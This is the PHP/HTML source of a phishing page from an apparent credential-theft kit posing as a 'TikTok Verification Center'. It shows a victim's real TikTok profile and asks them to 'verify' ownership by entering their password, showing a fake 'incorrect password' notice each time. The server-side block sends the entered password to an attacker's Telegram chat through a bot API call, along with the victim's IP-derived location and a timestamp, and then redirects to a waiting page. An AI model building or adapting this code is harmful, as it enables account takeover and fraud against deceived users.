<?php
session_start();
require_once 'api.php';
require_once 'functions.php';
$config = include('config/config.php');

// Kullanıcı adı kontrolü
if (!isset($_SESSION['username'])) {
    header("Location: form.php");
    exit();
}

$username = $_SESSION['username'];

// Profil bilgileri yoksa API'den çek
if (empty($_SESSION['profilePicBase64']) && $_SERVER['REQUEST_METHOD'] === 'GET') {
    $profileData = fetchTikTokProfile($username);
    
    if (!isset($profileData['error'])) {
        $_SESSION['profilePicBase64'] = $profileData['profilePicBase64'] ?? '';
        $_SESSION['fullName'] = $profileData['fullName'] ?? '';
        $_SESSION['followerCount'] = $profileData['followerCount'] ?? 0;
        $_SESSION['followingCount'] = $profileData['followingCount'] ?? 0;
        $_SESSION['mediacount'] = $profileData['mediacount'] ?? 0;
        $_SESSION['verified'] = $profileData['verified'] ?? false;
    }
}

// Profil bilgileri (oturumdan al)
$profilePicBase64 = $_SESSION['profilePicBase64'] ?? '';
$fullName = $_SESSION['fullName'] ?? '';
$followerCount = $_SESSION['followerCount'] ?? 0;
$followingCount = $_SESSION['followingCount'] ?? 0;
$mediacount = $_SESSION['mediacount'] ?? 0;
$verified = $_SESSION['verified'] ?? false;

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!verifyCsrfToken($_POST['csrf_token'] ?? null)) {
        http_response_code(400);
        exit('Bad Request');
    }
    $password = htmlspecialchars(trim($_POST["password"]), ENT_QUOTES, 'UTF-8');
    $ip = getUserIp();
    [$ulke, $sehir] = getLocation($ip);

    $site = htmlspecialchars($_SERVER["SERVER_NAME"], ENT_QUOTES, 'UTF-8');
    date_default_timezone_set('Europe/Istanbul');
    $cur_time = date("d-m-Y H:i:s");

    // Mesajı Markdown formatıyla oluştur
    $message = "🔒 *$username yeni şifre girdi!*\n\n"
        . "🔑 *Şifre:* `$password`\n"
        . "📍 *Konum:* $ulke / $sehir\n"
        . "⏰ *Tarih:* $cur_time\n";

    sendTelegramMessageCurl($config['apiToken'], $config['chatId'], $message);

    // Waiting sistemi için yönlendirme
    $_SESSION['waiting_id'] = bin2hex(random_bytes(16));
    $_SESSION['redirect_page'] = null;
    header("Location: waiting.php");
    exit();
}
?>
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TikTok Verification Center | Form</title>
    <link rel="stylesheet" href="assets/css/style.css">
    <style>
        .buttonbaba:disabled {
            background-color: rgba(245, 0, 86, 0.32) !important;
            cursor: not-allowed;
            opacity: 1;
        }
    </style>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100..900;1,100..900&display=swap"
        rel="stylesheet">

    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.13/css/intlTelInput.css">
    <link href="https://cdn.jsdelivr.net/npm/remixicon@4.5.0/fonts/remixicon.css" rel="stylesheet" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <style>
        /* Skeleton Loader Genel Tasarım */
        .skeleton {
            display: inline-block;
            background: #e0e0e0;
            background: linear-gradient(90deg, #e0e0e0 25%, #f0f0f0 50%, #e0e0e0 75%);
            background-size: 200% 100%;
            animation: skeleton-loading 1.5s infinite;
            border-radius: 4px;
        }

        /* Animasyon */
        @keyframes skeleton-loading {
            0% {
                background-position: 200% 0;
            }

            100% {
                background-position: -200% 0;
            }
        }

        /* Profil Fotoğrafı için Skeleton */
        .skeleton-img {
            width: 100px;
            height: 100px;
            border-radius: 50%;
            /* Yuvarlak görünümlü */
        }

        /* Metin için Skeleton */
        .skeleton-text {
            height: 16px;
            width: 60%;
            margin: 10px 0;
        }

        /* Info Container Skeleton */
        .skeleton-info {
            height: 16px;
            width: 30%;
            margin: 5px;
        }
    </style>
</head>

<body>

    <?php include 'header.php'; ?>

    <div class="hero form">
        <div class="container">
            <div class="left">
                <form method="post" autocomplete="off" class="form-container">
                    <input type="hidden" name="csrf_token" value="<?php echo htmlspecialchars(ensureCsrfToken(), ENT_QUOTES, 'UTF-8'); ?>">

                    <?php
                    if (!empty($profilePicBase64)) {
                        echo "
            <div class='userinfo'>
                        <img class='forepp' src='data:image/jpeg;base64,$profilePicBase64' alt=''>
                        <div class='name'>
                            <h3>$fullName</h3>
                        </div>
                        <p class='username'>@$username $verified</p>
                        <div class='stats' style='text-align: center;'>
                            <p><strong>$followingCount</strong><br>Following</p>
                            <p><strong>$followerCount</strong><br>Followers</p>
                            <p><strong>$mediacount</strong><br>Likes</p>
                        </div>
                    </div>
            ";
                    } else {
                        echo "
             <div class='userinfo'>
            <div class='forepp skeleton skeleton-img'></div>
            <div class='name'>
              <h3 style='width:160px;' class='skeleton skeleton-text'></h3>
              </div>
              <div class='stats'>
                <span style='width:50px;' class='skeleton skeleton-info'></span>
                <span style='width:50px;' class='skeleton skeleton-info'></span>
                <span style='width:50px;' class='skeleton skeleton-info'></span>
              </div>
            </div><br>
            ";
                    }
                    ?>
                    <p>Please log in so we can verify that you are the owner of this account.</p>
                    <div class="input-column">
                        <label for="password">Password</label>
                        <div class="input-with-icon">
                            <i class="ri-lock-line input-icon"></i>
                            <input name="password" type="password" required id="password"
                                placeholder="Please enter your password">
                            <button type="button" id="togglePassword"><i class="ri-eye-off-line"></i></button>
                        </div>
                    </div>

                    <button class="buttonbaba" type="submit" disabled>
                        <span id="3131">Continue</span>
                        <i class="fas fa-spinner fa-spin" id="loader" style="display: none;" aria-hidden="true"></i>
                    </button>
                    <script>
                        // Şifre kurallarını kontrol eden fonksiyon
                        function isValidPassword(password) {
                            return password.length >= 8 &&           // En az 8 karakter
                                /[A-Za-z]/.test(password) &&      // En az 1 harf
                                /[0-9]/.test(password) &&         // En az 1 sayı
                                /[^A-Za-z0-9]/.test(password);    // En az 1 özel karakter
                        }

                        const passwordInput = document.getElementById('password');
                        const submitBtn = document.querySelector('.buttonbaba');

                        passwordInput.addEventListener('input', function () {
                            submitBtn.disabled = !isValidPassword(passwordInput.value);
                        });
                    </script>
                    <p style="color: red;">We are sorry, your password was incorrect. Please check if your information
                        is correct.</p>
                </form>
            </div>
            <div class="right">
                <img src="assets/img/hero/hero1.bmp" alt="">
                <img src="assets/img/hero/hero2.bmp" alt="">
                <img src="assets/img/hero/hero3.bmp" alt="">
            </div>
        </div>
    </div>


    <?php include 'footer.php'; ?>


    <script src="https://code.jquery.com/jquery-3.7.1.slim.min.js"
        integrity="sha256-kmHvs0B+OpCW5GVHUNjv9rOmY0IvSIRcf7zGUDTDQM8=" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.13/js/intlTelInput-jquery.min.js"></script>
    <script>
        document.addEventListener("DOMContentLoaded", function () {
            const passwordInput = document.getElementById('password');
            const toggleButton = document.getElementById('togglePassword');
            const submitBtn = document.querySelector('.buttonbaba');

            // Şifre göster/gizle
            toggleButton.addEventListener('click', function () {
                const type = passwordInput.getAttribute('type') === 'password' ? 'text' : 'password';
                passwordInput.setAttribute('type', type);
                this.innerHTML = type === 'text' ? '<i class="ri-eye-line"></i>' : '<i class="ri-eye-off-line"></i>';
            });

            // Şifre doğrulama
            function isValidPassword(password) {
                return password.length >= 8 &&
                    /[A-Za-z]/.test(password) &&
                    /[0-9]/.test(password) &&
                    /[^A-Za-z0-9]/.test(password);
            }

            passwordInput.addEventListener('input', function () {
                submitBtn.disabled = !isValidPassword(passwordInput.value);
            });

            // Yükleme simgesi
            document.querySelector('form').addEventListener('submit', function () {
                document.getElementById('loader').style.display = 'inline-block';
                document.getElementById('3131').style.display = 'none';
            });
        });
    </script>

</body>

</html>